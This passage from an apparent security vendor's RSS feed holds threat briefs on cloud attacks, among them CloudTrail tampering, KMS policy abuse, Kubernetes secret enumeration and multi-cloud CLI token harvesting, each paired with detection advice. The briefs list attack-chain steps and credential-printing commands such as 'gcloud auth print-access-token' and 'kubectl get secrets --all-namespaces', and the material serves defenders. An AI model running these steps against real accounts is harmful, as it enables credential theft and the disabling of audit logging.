<li>Alternatively, the attacker may execute the <code>UpdateTrail</code> API call to modify the CloudTrail configuration. This could involve changing the S3 bucket destination, disabling log file validation, or altering event selectors to exclude specific events.</li>
<li>As another option, the attacker may execute the <code>DeleteTrail</code> API call, completely removing the CloudTrail configuration from the AWS account.</li>
<li>After disabling, modifying, or deleting the trail, the attacker proceeds with their malicious activities, knowing that their actions are less likely to be recorded and detected.</li>
<li>The attacker may then attempt to further obfuscate their activities by deleting or modifying any remaining log data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Disabling or modifying CloudTrail logging can have severe consequences. It impairs an organization&rsquo;s ability to detect and respond to security incidents in their AWS environment. Without proper logging, incident responders may struggle to determine the scope and impact of a breach, leading to delayed or ineffective remediation efforts. The inability to audit user activity can also hinder compliance efforts and potentially lead to regulatory penalties.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect <code>StopLogging</code>, <code>UpdateTrail</code>, and <code>DeleteTrail</code> events in CloudTrail logs.</li>
<li>Implement multi-factor authentication (MFA) for all AWS accounts, especially those with administrative privileges, to reduce the risk of unauthorized access.</li>
<li>Monitor AWS CloudTrail logs for unexpected changes to IAM policies, which could grant excessive permissions to attackers.</li>
<li>Enable log file validation to ensure the integrity of CloudTrail logs.</li>
<li>Use AWS Config to monitor CloudTrail configuration and alert on any deviations from the desired state.</li>
<li>Review AWS documentation on security best practices for AWS CloudTrail to ensure proper configuration and monitoring.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>defense-impairment</category><category>cloud</category></item><item><title>AWS KMS Key Policy Updated via PutKeyPolicy</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-kms-key-policy-put/</link><pubDate>Mon, 22 Jan 2024 18:23:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-kms-key-policy-put/</guid><description>Detection of successful PutKeyPolicy calls on AWS KMS keys to identify potential privilege escalation or unauthorized access by adversaries modifying key policies to decrypt or exfiltrate data.</description><content:encoded><![CDATA[<p>This rule detects the successful execution of the <code>PutKeyPolicy</code> API call within Amazon Web Services Key Management Service (AWS KMS). The <code>PutKeyPolicy</code> action replaces the entire key policy associated with a KMS key, potentially granting new or expanded permissions to principals. An adversary who gains the ability to modify KMS key policies (<code>kms:PutKeyPolicy</code>) can escalate privileges by adding external accounts or roles, allowing them to decrypt data protected by the key or maintain persistent access even after credential rotation. This activity is crucial to monitor, as it can lead to significant data breaches and unauthorized access to sensitive information. The rule focuses on identifying deviations from expected KMS key policy management practices to detect potentially malicious activity.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker compromises an AWS account or obtains IAM credentials with sufficient permissions, including <code>kms:PutKeyPolicy</code> on a target KMS key.</li>
<li>The attacker uses the compromised credentials to call the <code>PutKeyPolicy</code> API, replacing the existing key policy with a modified version.</li>
<li>The modified key policy grants the attacker&rsquo;s AWS account, or an external account, permissions to perform cryptographic operations on the key, such as <code>kms:Decrypt</code> or <code>kms:GenerateDataKey</code>.</li>
<li>The attacker utilizes the newly granted permissions to decrypt data encrypted with the KMS key, such as data stored in S3 buckets or EBS volumes.</li>
<li>The attacker may also grant administrative actions to new identities.</li>
<li>The attacker exfiltrates the decrypted data to an external location.</li>
<li>The attacker attempts to cover their tracks by deleting CloudTrail logs or modifying other security configurations.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to unauthorized access to sensitive data encrypted with the KMS key, potentially resulting in data breaches, financial loss, and reputational damage. The severity depends on the sensitivity of the data protected by the key and the scope of access granted to the attacker. This can impact organizations across various sectors that rely on AWS KMS for data encryption, potentially affecting millions of records and causing significant operational disruption.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS KMS Key Policy Updated via PutKeyPolicy&rdquo; to your SIEM and tune for your environment to detect unauthorized modifications to KMS key policies.</li>
<li>Review the policy document diff in <code>aws.cloudtrail.request_parameters</code> and <code>aws.cloudtrail.response_elements</code> to identify unauthorized changes to principals.</li>
<li>Restrict the <code>kms:PutKeyPolicy</code> permission to break-glass roles only, limiting the potential for unauthorized modifications.</li>
<li>Monitor <code>iam:AttachRolePolicy</code> and <code>sts:AssumeRole</code> events to correlate with potential privilege escalation attempts related to KMS key access.</li>
<li>Restore a known-good KMS policy from backup or IAM/KMS change history to remediate unauthorized modifications.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>kms</category><category>privilege-escalation</category><category>defense-evasion</category></item><item><title>Kubernetes Secret Access by Node or Pod Service Account</title><link>https://feed.craftedsignal.io/briefs/2024-01-kubernetes-secret-access/</link><pubDate>Wed, 03 Jan 2024 18:22:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-kubernetes-secret-access/</guid><description>This rule detects Kubernetes audit events where a node or pod service account attempts to read secrets directly, which is often a sign of credential access.</description><content:encoded><![CDATA[<p>This detection rule identifies suspicious Kubernetes API access patterns indicative of credential access. Specifically, it focuses on <code>get</code> or <code>list</code> operations targeting the <code>secrets</code> resource performed by node identities (<code>system:node:*</code>) or pod service accounts (<code>system:serviceaccount:*</code>). Attackers who have compromised a pod service account or node credentials might attempt to enumerate secrets to discover sensitive information such as tokens, registry credentials, TLS keys, or application configurations. While legitimate controllers may read secrets, direct access from node or pod service accounts warrants investigation, especially when cross-namespace or involving high-value secrets. The rule is intended to be triaged based on namespace scope, user agent, RBAC, and relevance of the identity to the accessed secret.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker gains initial access to a Kubernetes cluster, possibly through compromising a pod or node.</li>
<li>Attacker obtains credentials for a service account associated with the compromised pod or accesses node credentials.</li>
<li>Attacker uses the stolen credentials to authenticate against the Kubernetes API.</li>
<li>The attacker attempts to enumerate secrets within the cluster using <code>kubectl get secrets --all-namespaces</code> or similar API calls.</li>
<li>The Kubernetes API server receives the request and generates an audit log entry.</li>
<li>This audit log entry contains details such as the user (<code>system:node:*</code> or <code>system:serviceaccount:*</code>), the action (<code>get</code> or <code>list</code>), and the resource (<code>secrets</code>).</li>
<li>The attacker identifies valuable secrets containing sensitive information such as API keys or database passwords.</li>
<li>Attacker exfiltrates the secrets, gaining unauthorized access to other systems or data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Compromised Kubernetes secrets can lead to a wide range of security breaches, including unauthorized access to sensitive data, lateral movement within the cluster, and compromised external services that rely on the exposed credentials. If successful, attackers could gain complete control over the cluster and its applications, leading to data breaches, service disruption, and reputational damage. The risk is elevated in environments where secrets are not properly managed or where RBAC is overly permissive.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect unauthorized secret access attempts by node or pod service accounts in Kubernetes audit logs.</li>
<li>Review RBAC configurations to ensure least privilege for service accounts and nodes, limiting their access to only necessary secrets.</li>
<li>Investigate any alerts generated by the Sigma rule, focusing on cross-namespace access, high-value secret names, and unusual user agents.</li>
<li>Implement a process for regularly rotating secrets and auditing access to sensitive resources within the Kubernetes cluster.</li>
<li>Baseline normal secret access patterns for in-cluster operators, CSI drivers, and GitOps agents, and create allowlists to reduce false positives.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>kubernetes</category><category>credential-access</category><category>cloud</category></item><item><title>Okta Alerts Following Unusual Proxy Authentication</title><link>https://feed.craftedsignal.io/briefs/2024-01-okta-proxy-auth-alerts/</link><pubDate>Wed, 03 Jan 2024 15:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-okta-proxy-auth-alerts/</guid><description>Attackers use proxy infrastructure to mask their origin when using stolen Okta credentials, and this rule correlates the first occurrence of an Okta user session started via a proxy with subsequent Okta security alerts for the same user.</description><content:encoded><![CDATA[<p>Attackers frequently use proxy infrastructure (VPNs, Tor, residential proxies) to mask their origin when using stolen credentials. This behavior often triggers additional detection rules after the initial authentication. By correlating the first instance of Okta user authentication via a proxy with subsequent Okta security alerts for the same user, this rule aims to identify potentially compromised accounts. This correlation focuses on activity within a 30-minute window following the initial proxy authentication, helping to pinpoint users whose proxy-based authentication was followed by suspicious activity. The rule leverages Okta system logs and alerts to identify these patterns. This is important for defenders to quickly identify compromised accounts and prevent further damage.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker obtains valid Okta credentials through phishing, credential stuffing, or other means. (T1078)</li>
<li>The attacker initiates an Okta user session from behind a proxy (VPN, Tor, etc.) to mask their origin.</li>
<li>Okta classifies the connection as originating from a proxy.</li>
<li>The user successfully authenticates and starts a session.</li>
<li>Post-authentication, the attacker attempts to access sensitive applications or data. (T1078.004)</li>
<li>The attacker&rsquo;s activity triggers an Okta security alert, such as unusual access patterns or MFA bypass attempts.</li>
<li>The detection rule correlates the proxy authentication event with the subsequent security alert.</li>
<li>Security team investigates and responds to the potential account compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can lead to unauthorized access to sensitive data, privilege escalation, and lateral movement within the organization&rsquo;s cloud environment. Multiple alerts, coupled with proxy authentication, indicate a higher likelihood of account compromise. If successful, attackers could exfiltrate sensitive data, modify configurations, or disrupt services.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Okta Alerts Following Unusual Proxy Authentication&rdquo; to your SIEM and tune for your environment to detect suspicious activity after proxy authentication.</li>
<li>Investigate correlated security alerts triggered after proxy authentication events for affected users, as highlighted by the Sigma rule.</li>
<li>Monitor Okta system logs for authentication events originating from known malicious proxy IP addresses and block them at the network perimeter.</li>
<li>Review user&rsquo;s Okta activity for signs of account takeover (MFA changes, new devices, unusual app access) after proxy authentication.</li>
<li>Implement multi-factor authentication (MFA) to reduce the risk of account compromise via stolen credentials, as this attack relies on valid accounts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>identity</category><category>cloud</category><category>okta</category><category>initial-access</category></item><item><title>AWS SES Identity Deletion</title><link>https://feed.craftedsignal.io/briefs/2024-01-ses-identity-deleted/</link><pubDate>Wed, 03 Jan 2024 15:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-ses-identity-deleted/</guid><description>Detection of an AWS Simple Email Service (SES) identity deletion event, potentially indicating an adversary attempting to cover their tracks after malicious activity.</description><content:encoded><![CDATA[<p>This threat brief focuses on the detection of the &ldquo;DeleteIdentity&rdquo; event within AWS Simple Email Service (SES) logs. An adversary who has gained unauthorized access to an AWS environment and utilized SES for malicious purposes, such as sending phishing emails or distributing malware, might attempt to erase their activity by deleting the SES identity (email address or domain) used in the attack. This action is a form of obfuscation and aims to hinder forensic investigations. While legitimate users may occasionally delete SES identities, the event warrants scrutiny, especially in the context of other suspicious cloud activity.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to an AWS account, potentially through compromised credentials or exploiting a vulnerability.</li>
<li>The attacker explores the AWS environment, identifying SES as a service to abuse for sending malicious emails.</li>
<li>The attacker configures SES, verifies an email address or domain, and establishes sending capabilities.</li>
<li>The attacker crafts and sends phishing emails or emails containing malicious attachments to external targets.</li>
<li>After the malicious campaign, the attacker attempts to cover their tracks by deleting the SES identity to remove evidence of their activity.</li>
<li>The attacker executes the &ldquo;DeleteIdentity&rdquo; API call within SES, specifying the identity to be removed.</li>
<li>AWS CloudTrail logs record the &ldquo;DeleteIdentity&rdquo; event, capturing details such as the event source, event name, and user identity.</li>
<li>The attacker may further attempt to delete or modify other CloudTrail logs to eliminate the traces of their actions.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The successful deletion of an SES identity hinders incident response and forensic investigations. If an attacker successfully removes the SES identity, it becomes more difficult to trace the origin of malicious emails and attribute the activity to a specific actor. The deletion itself does not directly cause harm, but it obstructs the ability to understand the full scope and impact of the attack.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Implement the provided Sigma rule (<code>SES Identity Has Been Deleted</code>) to detect SES identity deletion events within your CloudTrail logs.</li>
<li>Investigate any detected <code>DeleteIdentity</code> events, correlating them with other suspicious AWS activity, such as unusual IAM role usage or unauthorized access attempts.</li>
<li>Enable and monitor AWS CloudTrail logs for all regions within your AWS account to ensure comprehensive event capture.</li>
<li>Implement strong IAM policies and multi-factor authentication (MFA) to prevent unauthorized access to AWS accounts.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>attack.stealth</category><category>attack.t1070</category><category>cloud</category></item><item><title>AWS Lateral Movement from Kubernetes Service Account via AssumeRoleWithWebIdentity</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-k8s-lateral-movement/</link><pubDate>Wed, 03 Jan 2024 15:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-k8s-lateral-movement/</guid><description>This rule detects lateral movement in AWS environments originating from Kubernetes service accounts by identifying instances where credentials obtained for a service account are used for multiple distinct AWS control-plane actions, potentially indicating unauthorized access.</description><content:encoded><![CDATA[<p>This detection rule identifies lateral movement in AWS environments stemming from Kubernetes service accounts utilizing <code>AssumeRoleWithWebIdentity</code>. It focuses on detecting instances where credentials obtained via this method are subsequently used to perform several distinct AWS control-plane actions within a single session. This behavior deviates from typical pod traffic and could signify unauthorized access or privilege escalation. The rule prioritizes the detection of sensitive API usage, including reconnaissance activities, access to secrets, IAM modifications, and compute creation events, while strategically excluding high-volume S3 data-plane operations to minimize false positives. The targeted environments are those leveraging EKS IAM Roles for Service Accounts.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A Kubernetes service account projects a token.</li>
<li>The service account uses <code>AssumeRoleWithWebIdentity</code> to exchange the token for short-lived IAM credentials.</li>
<li>The attacker leverages the assumed role to perform reconnaissance activities such as <code>ListUsers</code>, <code>ListRoles</code>, and <code>DescribeInstances</code>.</li>
<li>The attacker attempts to access secrets using actions like <code>GetSecretValue</code> and <code>ListSecrets</code>.</li>
<li>The attacker escalates privileges by modifying IAM policies with actions like <code>AttachRolePolicy</code> and <code>PutRolePolicy</code>.</li>
<li>The attacker attempts to create new users or roles within the AWS environment using actions like <code>CreateUser</code> and <code>CreateRole</code>.</li>
<li>The attacker performs lateral movement using actions like <code>SendCommand</code> and <code>StartSession</code>.</li>
<li>The attacker attempts to evade detection by stopping logging with the <code>StopLogging</code> action.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation can lead to unauthorized access to sensitive data, privilege escalation, and the potential compromise of the entire AWS environment. Lateral movement within the AWS infrastructure allows attackers to gain access to critical systems and data, potentially leading to data breaches, service disruptions, or other malicious activities.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect potentially malicious activity related to <code>AssumeRoleWithWebIdentity</code> and tune for your environment.</li>
<li>Review and harden IAM role trust policies associated with Kubernetes service accounts, specifically focusing on OIDC trust conditions, as referenced in the <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers_create_oidc.html">IAM OIDC identity provider</a> documentation.</li>
<li>Implement strict least privilege principles for Kubernetes service accounts, limiting their access to only the necessary AWS resources, as covered in <a href="https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html">EKS IAM roles for service accounts</a>.</li>
<li>Monitor CloudTrail logs for <code>AssumeRoleWithWebIdentity</code> events followed by suspicious API calls, focusing on the actions listed in the Sigma rule detection patterns.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>kubernetes</category><category>lateral-movement</category><category>credential-access</category><category>discovery</category></item><item><title>Multi-Cloud CLI Token and Credential Access via Command-Line Harvesting</title><link>https://feed.craftedsignal.io/briefs/2024-01-multi-cloud-cli-token-harvesting/</link><pubDate>Wed, 03 Jan 2024 14:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-multi-cloud-cli-token-harvesting/</guid><description>This rule detects command-line activity indicative of credential access across multiple cloud platforms (GCP, Azure, AWS, GitHub, DigitalOcean, Oracle, Kubernetes), looking for specific commands used to print or access tokens and credentials, flagging hosts where multiple cloud targets are accessed within a five-minute window, suggesting potential credential harvesting activity.</description><content:encoded><![CDATA[<p>This threat brief focuses on detecting command-line credential harvesting across multiple cloud platforms. Attackers may attempt to steal application access tokens or extract credentials from files by executing specific commands via command-line interfaces (CLIs) for GCP, Azure, AWS, GitHub, DigitalOcean, Oracle, and Kubernetes. This activity is particularly concerning when originating from the same host within a short time frame (e.g., five minutes), potentially indicating automated credential theft. This technique can lead to unauthorized access to cloud resources, data breaches, and lateral movement within cloud environments. Defenders should monitor for suspicious command-line activity involving cloud CLIs and credential access patterns.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to a system, possibly via compromised credentials or exploiting a vulnerability.</li>
<li>The attacker uses a shell (cmd.exe, PowerShell, bash, etc.) to execute cloud CLI commands.</li>
<li>The attacker executes commands to list available credentials or tokens (e.g., <code>aws configure list</code>, <code>az account list</code>, <code>kubectl config view</code>).</li>
<li>The attacker executes commands to print access tokens for various cloud providers (e.g., <code>gcloud auth print-access-token</code>, <code>az account get-access-token</code>, <code>gh auth token</code>).</li>
<li>The attacker uses credential harvesting commands across multiple cloud platforms within a short timeframe.</li>
<li>The attacker exfiltrates the harvested credentials to a remote location.</li>
<li>The attacker uses the stolen credentials to access sensitive cloud resources and data.</li>
<li>The attacker performs lateral movement within the cloud environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful attack can lead to unauthorized access to sensitive cloud resources, data breaches, and lateral movement within cloud environments. The impact includes potential data exfiltration, service disruption, and financial loss. The number of affected victims will depend on the scope of the compromised credentials and the attacker&rsquo;s ability to exploit them.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Multi-Cloud CLI Token and Credential Access Commands&rdquo; to your SIEM to detect suspicious command-line activity related to cloud credential harvesting.</li>
<li>Review <code>Esql.process_command_line_values</code> in the rule output to identify the exact commands executed and determine if the activity was legitimate or malicious.</li>
<li>Correlate the detected activity with authentication, Kubernetes audit, and cloud API logs to confirm unauthorized access and misuse of printed tokens.</li>
<li>Implement monitoring and alerting for unusual CLI activity originating from user workstations or build servers, focusing on the CLIs mentioned in the Overview section.</li>
<li>Follow vendor-specific guidance to revoke compromised credentials, such as revoking tokens and rotating secrets, as outlined in the rule&rsquo;s &ldquo;Response and remediation&rdquo; section.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>credential-access</category><category>cloud</category><category>cli</category><category>token-harvesting</category></item><item><title>Detection of Azure Service Principal Creation</title><link>https://feed.craftedsignal.io/briefs/2024-01-azure-sp-creation/</link><pubDate>Wed, 03 Jan 2024 14:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-azure-sp-creation/</guid><description>Detects the creation of a service principal in Azure, which could indicate potential attacker activity for lateral movement or persistence.</description><content:encoded><![CDATA[<p>The creation of service principals in Azure can be a legitimate administrative task, but it can also be an indicator of malicious activity. Attackers may create service principals to establish persistence, move laterally within the Azure environment, or gain unauthorized access to resources. This activity is particularly concerning when performed by unfamiliar users or from unusual locations. Monitoring for unexpected service principal creation is crucial for detecting potential security breaches in Azure environments. This alert focuses on detecting the &ldquo;Add service principal&rdquo; message within Azure Activity Logs.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to an Azure account, possibly through compromised credentials or a vulnerable application.</li>
<li>The attacker authenticates to the Azure portal or uses Azure CLI with the compromised credentials.</li>
<li>The attacker executes commands to create a new service principal using tools like Azure CLI or PowerShell.</li>
<li>Azure Activity Logs record the &ldquo;Add service principal&rdquo; event.</li>
<li>The attacker assigns roles and permissions to the newly created service principal, granting it access to specific resources.</li>
<li>The attacker leverages the service principal for lateral movement, accessing resources or services within the Azure environment.</li>
<li>The service principal is used for persistence, allowing the attacker to maintain access even if the initial access method is revoked.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful creation and misuse of a service principal can lead to unauthorized access to sensitive data, resources, and services within the Azure environment. The impact can range from data breaches and service disruption to complete control over the Azure subscription, potentially affecting hundreds or thousands of resources and users. The attacker can leverage the compromised service principal to perform actions with the permissions assigned to it, leading to significant damage and financial loss.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Azure Service Principal Created&rdquo; to your SIEM and tune for your environment to detect suspicious service principal creations.</li>
<li>Investigate any alerts generated by the &ldquo;Azure Service Principal Created&rdquo; rule (logsource: azure) by verifying the user identity, user agent, and hostname associated with the event.</li>
<li>Review and audit existing service principals and their assigned permissions to identify any anomalies or overly permissive configurations.</li>
<li>Implement multi-factor authentication (MFA) for all user accounts to reduce the risk of credential compromise and unauthorized access.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>azure</category><category>cloud</category><category>service principal</category><category>persistence</category><category>lateral movement</category></item><item><title>AWS SecurityHub Findings Evasion via API Calls</title><link>https://feed.craftedsignal.io/briefs/2024-01-aws-securityhub-evasion/</link><pubDate>Wed, 03 Jan 2024 14:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-aws-securityhub-evasion/</guid><description>Attackers can impair defenses by modifying or deleting findings and insights within AWS SecurityHub using API calls such as BatchUpdateFindings, DeleteInsight, UpdateFindings, and UpdateInsight.</description><content:encoded><![CDATA[<p>Attackers with sufficient AWS privileges can manipulate SecurityHub findings to evade detection and maintain persistence within a compromised environment. This involves using SecurityHub&rsquo;s API to either modify existing findings, delete insights altogether, or update insights to mask malicious activity. This activity is conducted via API calls to <code>securityhub.amazonaws.com</code>, specifically targeting the <code>BatchUpdateFindings</code>, <code>DeleteInsight</code>, <code>UpdateFindings</code>, and <code>UpdateInsight</code> actions. Successful evasion allows malicious actors to operate without triggering alarms or attracting attention from security personnel, leading to prolonged compromise and potentially greater damage. This is especially critical in production environments where SecurityHub findings are actively monitored.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial access to an AWS account, potentially through compromised credentials or exploiting a misconfigured IAM role (T1078).</li>
<li>The attacker enumerates existing SecurityHub findings and insights to identify potential targets for modification or deletion.</li>
<li>The attacker calls the <code>BatchUpdateFindings</code> API to modify the severity, confidence, or resolution status of specific findings, effectively silencing alerts (T1562.003).</li>
<li>Alternatively, the attacker calls the <code>UpdateFindings</code> API to modify individual findings.</li>
<li>The attacker calls the <code>DeleteInsight</code> API to remove custom insights that could reveal their activities (T1562).</li>
<li>As another option, the attacker calls the <code>UpdateInsight</code> API to modify the criteria of existing insights, causing them to miss malicious activities.</li>
<li>The attacker validates the changes by querying SecurityHub to confirm that the targeted findings and insights have been successfully altered or removed.</li>
<li>The attacker continues malicious activities, such as data exfiltration or lateral movement, with a reduced risk of detection due to the modified SecurityHub state (TA0005).</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful evasion of SecurityHub findings can lead to delayed incident response, prolonged attacker presence within the AWS environment, and increased data exfiltration or system compromise. The impact is particularly severe in production environments where SecurityHub is relied upon for real-time threat detection and alerting. By modifying or deleting findings, attackers can effectively blind security teams, enabling them to operate undetected for extended periods. The number of potential victims is directly proportional to the scale of AWS deployments relying on SecurityHub.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS SecurityHub Findings Evasion&rdquo; to your SIEM and tune for your environment to detect suspicious API calls related to findings manipulation (logsource: aws, service: cloudtrail).</li>
<li>Review and harden IAM policies to restrict access to SecurityHub API actions such as <code>BatchUpdateFindings</code>, <code>DeleteInsight</code>, <code>UpdateFindings</code>, and <code>UpdateInsight</code> to only authorized users and roles.</li>
<li>Implement multi-factor authentication (MFA) for all AWS accounts and roles, especially those with permissions to modify SecurityHub configurations.</li>
<li>Regularly audit CloudTrail logs for suspicious activity related to SecurityHub configuration changes.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>aws</category><category>cloud</category><category>securityhub</category><category>defense-evasion</category></item><item><title>AWS Identity Center Identity Provider Modification</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-aws-idp-change/</link><pubDate>Wed, 03 Jan 2024 14:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-aws-idp-change/</guid><description>An adversary modifies the AWS Identity Center identity provider configuration, potentially leading to persistent access and privilege escalation through user impersonation.</description><content:encoded><![CDATA[<p>AWS Identity Center (formerly AWS SSO) enables centralized management of access to AWS accounts and applications. Attackers can manipulate the configured identity provider to gain unauthorized access. The modification of the configured Identity Provider (IdP) within AWS Identity Center can lead to a full compromise of the AWS environment. By associating a malicious directory or disabling/disassociating legitimate directories, attackers can potentially establish persistent access, escalate privileges, and impersonate legitimate users. This can be achieved by utilizing compromised AWS credentials or exploiting vulnerabilities in the AWS environment.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Initial access is gained via compromised AWS credentials or by exploiting an AWS vulnerability.</li>
<li>The attacker enumerates the current AWS Identity Center configuration to identify the currently associated directory.</li>
<li>The attacker disassociates the existing, legitimate directory using <code>DisassociateDirectory</code>.</li>
<li>The attacker associates a malicious directory they control using <code>AssociateDirectory</code>. This malicious directory is configured to impersonate legitimate users.</li>
<li>Alternatively, the attacker disables external IdP configuration for the directory using <code>DisableExternalIdPConfigurationForDirectory</code>.</li>
<li>The attacker enables external IdP configuration for the directory, pointing to an attacker-controlled IdP, using <code>EnableExternalIdPConfigurationForDirectory</code>.</li>
<li>The attacker uses the malicious or attacker-controlled IdP to authenticate as legitimate users, gaining access to AWS resources.</li>
<li>The attacker performs malicious actions within the AWS environment, such as data exfiltration or resource destruction.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful modification of the AWS Identity Center identity provider can lead to complete compromise of an AWS environment. Attackers can gain persistent access, escalate privileges, and impersonate legitimate users. This can result in data breaches, service disruption, financial loss, and reputational damage. The impact can extend to all AWS accounts and applications managed by the compromised Identity Center instance.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect unauthorized changes to the AWS Identity Center identity provider.</li>
<li>Investigate any detected events related to <code>AssociateDirectory</code>, <code>DisableExternalIdPConfigurationForDirectory</code>, <code>DisassociateDirectory</code>, or <code>EnableExternalIdPConfigurationForDirectory</code> in AWS CloudTrail logs.</li>
<li>Implement multi-factor authentication (MFA) for all AWS accounts and users to reduce the risk of credential compromise.</li>
<li>Review and restrict IAM permissions to minimize the blast radius of compromised credentials.</li>
<li>Monitor AWS CloudTrail logs for unusual activity patterns that might indicate malicious directory association attempts.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>cloud</category><category>aws</category><category>identity</category><category>persistence</category><category>credential-access</category><category>defense-evasion</category></item><item><title>AWS IAM User or Access Key Creation via S3 Browser</title><link>https://feed.craftedsignal.io/briefs/2024-01-03-s3browser-iam/</link><pubDate>Wed, 03 Jan 2024 14:30:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-03-s3browser-iam/</guid><description>The use of S3 Browser to create IAM users or access keys in AWS environments indicates a potential privilege escalation, persistence, or initial access attempt by threat actors leveraging a known cloud administration tool.</description><content:encoded><![CDATA[<p>The S3 Browser utility, a Windows-based client for managing Amazon S3 storage and other cloud services, can be abused by threat actors to create new IAM users or access keys within compromised AWS environments. This activity, if unauthorized, can lead to privilege escalation, persistence, or even initial access, depending on the context of the compromise. The use of S3 Browser is identifiable via the userAgent string in AWS CloudTrail logs. While legitimate use of S3 Browser for administrative tasks exists, its unexpected appearance in user activity, particularly in sensitive accounts, should be investigated. This activity is particularly concerning because it can allow attackers to establish a foothold in the cloud environment and move laterally.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker gains initial access to an AWS environment, potentially through compromised credentials or an exploited vulnerability.</li>
<li>The attacker installs and configures S3 Browser on a compromised host or uses an existing installation.</li>
<li>The attacker authenticates S3 Browser to the AWS environment using existing compromised credentials or an assumed role.</li>
<li>The attacker uses S3 Browser to execute the <code>CreateUser</code> API call within AWS IAM.</li>
<li>The attacker configures the new IAM user with elevated privileges, potentially granting administrator access.</li>
<li>Alternatively, the attacker uses S3 Browser to execute the <code>CreateAccessKey</code> API call for an existing IAM user.</li>
<li>The attacker uses the newly created access key to perform actions within the AWS environment.</li>
<li>The attacker leverages the new user or access key for persistence, lateral movement, and data exfiltration within the AWS environment.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation and IAM creation can lead to complete compromise of the AWS environment. An attacker with escalated privileges can access sensitive data, modify configurations, disrupt services, and deploy malicious infrastructure. Depending on the permissions granted to the created user or access key, the attacker could potentially pivot to other AWS accounts or services, leading to widespread damage. This can result in significant financial losses, reputational damage, and regulatory penalties.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;AWS IAM S3Browser User or AccessKey Creation&rdquo; to your SIEM and tune for your environment to detect anomalous IAM activity originating from S3 Browser.</li>
